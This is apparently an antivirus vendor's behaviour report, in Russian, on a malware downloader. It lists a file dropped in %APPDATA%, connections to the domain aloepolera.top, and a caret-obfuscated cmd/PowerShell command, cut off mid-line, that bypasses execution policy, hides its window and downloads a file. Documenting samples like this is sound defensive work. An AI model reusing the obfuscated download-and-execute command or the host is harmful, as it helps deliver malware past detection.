Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "p^o^w^E^R^s^h^e^l^L^.E^xe ^-eXeCUTiO^NpoliC^Y bY^P^as^s^ -N^oprO^fIl^E -^wi^N^d^OwSt^yL^e HiddE^N (nE^W-OBJeCt sYS^t^E^M.N^e^t^.^WeBclie^N^t).d^o^w^nl^O^AdF^Ile^('http://...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "p^o^w^E^R^s^h^e^l^L^.E^xe ^-eXeCUTiO^NpoliC^Y bY^P^as^s^ -N^oprO^fIl^E -^wi^N^d^OwSt^yL^e HiddE^N (nE^W-OBJeCt sYS^t^E^M.N^e^t^.^WeBclie^N^t).d^o^w^nl^O^AdF^Ile^('http://...' (со скрытым окном)
